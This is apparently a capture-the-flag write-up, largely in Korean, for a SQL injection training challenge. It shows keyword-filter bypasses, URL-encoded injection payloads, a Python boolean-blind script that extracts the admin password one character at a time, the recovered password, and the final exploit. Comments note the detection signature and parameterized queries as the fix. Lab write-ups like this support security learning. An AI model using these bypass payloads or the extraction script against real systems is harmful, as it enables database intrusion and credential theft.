no 파라미터에서 필터링되는 문자/키워드: prob _ . () ' substr ascii = or and whitespace like 0x
pw 파라미터에서 필터링되는 문자: '
1. pw 길이 알아내기
띄어쓰기 우회 -> %0a
' 우회 -> "
like 우회 -> in
?pw=a&no=0||id in ("admin") && length(pw) in (8)%23
?pw=a&no=0%7C%7C%0aid%0ain%0a("admin")%26%26length(pw)%0ain%0a(8)%23
2. pw 알아내기
?pw=a&no=0%7C%7C%0aid%0ain%0a(%22admin%22)%0a%26%26%0aright(left(pw,{i}),1)%0ain%0a(char({c}))%23
import requests
password: str = ""
# Boolean-based blind inference against the training challenge: one request per
# (position, candidate character); the response body decides which branch the
# injected condition took. Nothing else is sent or stored.
for i in range(1, 9):  # positions 1..8 -- the length was fixed in step 1 of the notes
    cookies = {"PHPSESSID":""}  # presumably the challenge session cookie; left blank in the write-up
    for c in range(48, 123):  # candidate byte values '0'..'z' (digits, punctuation, letters)
        url = f"https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?pw=a&no=0%7C%7C%0aid%0ain%0a(%22admin%22)%0a%26%26%0aright(left(pw,{i}),1)%0ain%0a(char({c}))%23"
        res = requests.get(url, cookies=cookies)
        # The script treats this substring as its oracle for "condition true".
        if "Hello admin" in res.text:
            password+=chr(c)
            print(password)
            break
# NOTE(review): from the server side this is up to ~75 near-identical requests per
# character position differing only in the injected parameter -- a pattern that
# request-rate and log analysis can flag. The keyword denylist described in the
# notes above was worked around with substitute tokens, which is why a denylist is
# not a sufficient control: the root fix is a parameterized query for `no`/`pw`.
52dc3991
3. 최종 익스플로잇
?pw=52dc3991&no=0%7C%7Cid%0ain%0a(%22admin%22)%0a%26%26%0apw%0ain%0a(%2252dc3991%22)%23